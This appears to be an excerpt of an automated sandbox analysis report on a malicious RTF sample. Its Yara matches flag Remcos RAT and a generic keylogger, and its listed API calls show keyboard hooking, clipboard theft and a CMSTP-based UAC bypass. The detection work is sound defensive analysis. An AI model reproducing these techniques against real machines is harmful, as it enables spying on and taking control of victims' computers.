Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 0000000B.00000002.371347522.000000000019C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/Y
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 00000009.00000002.378984808.0000000000124000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: svchost.exe, 00000009.00000003.378925732.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com
Source: svchost.exe, 00000009.00000003.378615082.000000000055E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378336517.0000000000560000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.379157015.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378511247.00000000026AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 7_2_0040A2F3
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00D6407C
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_00D6427A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0140427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_0140427A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_004168FC
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00D6407C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 5_2_00D5003A
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D7CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 5_2_00D7CB26
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0141CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 6_2_0141CB26
Yara detected Keylogger Generic
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041CA73 SystemParametersInfoW, 7_2_0041CA73

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: WC5Gv13cOQ.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: This is a third-party compiled AutoIt script. 5_2_00CF3B4C
Source: taskhostw.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_921122ed-a
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_86611a87-e
Source: taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0c71adcf-b
Source: taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_18eed303-6
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: This is a third-party compiled AutoIt script. 6_2_01393B4C
Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0bf80cf6-4
Source: name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_d50f2897-9
Source: name.exe, 0000000D.00000002.394701390.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b5798a10-8
Source: name.exe, 0000000D.00000002.394701390.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_a1fcae99-d
